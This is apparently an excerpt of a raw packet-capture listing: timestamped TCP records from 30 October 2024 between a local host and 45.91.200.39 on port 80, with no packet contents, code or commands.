                                                                                              Oct 30, 2024 19:47:06.083412886 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083422899 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083435059 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083442926 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083457947 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083482981 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083645105 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083657026 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083667040 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083678007 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083678961 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083695889 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083717108 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.170949936 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.171022892 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.171082973 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.171122074 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.171122074 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.171178102 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.204920053 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.204943895 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.204957008 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.204968929 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.204982042 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.204993963 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205008984 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205008984 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205008984 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205085993 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205085993 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205085993 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205125093 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205137968 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205149889 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205169916 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205179930 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205183983 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205195904 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205202103 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205209970 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205223083 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205224037 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205236912 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205249071 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205271959 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205295086 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205668926 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205682039 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205693960 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205713987 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205718994 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205725908 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205743074 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205745935 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205745935 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205758095 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205769062 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205770969 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205784082 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205797911 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.205797911 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205830097 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.205854893 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.207695961 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.207745075 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.207767010 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.207779884 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.207788944 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.207814932 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.207828999 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.207850933 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.207869053 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.207885027 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.207895041 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.207921028 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.207927942 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.207978010 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.207992077 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208010912 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208039045 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208045006 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208076000 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208077908 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208096981 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208117962 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208122969 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208157063 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208158970 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208190918 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208208084 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208225012 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208240032 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208257914 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208272934 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208292961 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208303928 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208327055 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208336115 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208360910 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208375931 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208395004 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208405972 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208429098 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208445072 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208462954 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208475113 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208499908 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.208518982 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.208542109 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.287822962 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.287863970 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.287906885 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.287915945 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.287972927 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.287972927 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.322519064 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322550058 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322566986 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322582006 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322597980 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322612047 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322628021 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322627068 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.322668076 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.322668076 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.322668076 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.322923899 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322938919 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322952986 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322967052 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.322968006 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322978973 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.322983980 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.322990894 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.322999954 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323004007 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323014975 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323021889 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323030949 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323035002 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323049068 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323056936 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323070049 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323085070 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323143959 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323179960 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323211908 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323225975 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323245049 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323259115 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323374033 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323389053 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323402882 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323416948 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323417902 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323431015 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323435068 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323446035 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323460102 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323470116 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323682070 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323704958 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323723078 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323739052 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323803902 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323818922 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323832989 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323841095 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323851109 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323853016 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323868036 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323870897 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323889017 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323892117 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323908091 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323913097 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323925018 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.323926926 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323944092 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.323956966 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324151039 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324172020 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324186087 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324197054 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324202061 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324210882 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324218035 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324227095 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324234009 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324238062 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324249983 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324253082 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324265003 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324269056 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324287891 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324300051 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324409008 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324446917 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324631929 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324646950 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324670076 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324682951 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324800014 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324815035 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324829102 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324840069 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324845076 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324861050 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324865103 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324887037 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324908972 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324924946 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324939013 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324954987 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324963093 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324968100 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.324976921 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.324992895 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.325001955 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.404948950 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.405086994 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.405102968 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.405112982 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.405145884 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.405154943 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.439084053 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439121008 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439136982 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439192057 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439208031 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439224005 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.439244986 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.439251900 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439286947 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.439413071 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439426899 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439440966 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.439454079 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.439481020 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.569233894 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.569289923 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.575068951 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.575198889 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.575212002 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.872137070 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.872224092 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.885951042 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.891484976 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:07.148030996 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:07.148312092 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:07.381558895 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:07.386985064 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:07.619817019 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:07.619846106 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:07.619863033 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:07.620007038 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:07.620007038 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:07.622453928 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:07.627958059 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:07.858901024 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:07.859126091 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:07.874089956 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:07.879553080 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.111810923 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.111891031 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.209654093 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.209794044 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.215172052 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215197086 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215209961 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215221882 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215230942 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.215238094 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215275049 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215281010 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.215326071 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.215399027 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215435982 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215449095 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215449095 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.215487957 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.215560913 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.215600014 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220365047 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220400095 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220412970 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220413923 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220424891 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220443964 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220470905 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220491886 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220504045 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220518112 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220545053 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220545053 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220571995 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220598936 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220621109 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220648050 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220673084 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220705986 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220736980 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220748901 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220774889 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220779896 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220818996 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.220832109 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.220875025 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.225641966 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.225703001 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.225725889 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.225781918 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.225800991 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.225847006 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.225872040 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.225888014 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.225908995 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.225914001 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.225920916 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.225935936 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.225958109 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.225971937 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.226042986 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226056099 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226066113 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226070881 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226085901 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.226089954 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226102114 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226113081 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226124048 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226149082 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.226175070 CET4973080192.168.2.445.91.200.39
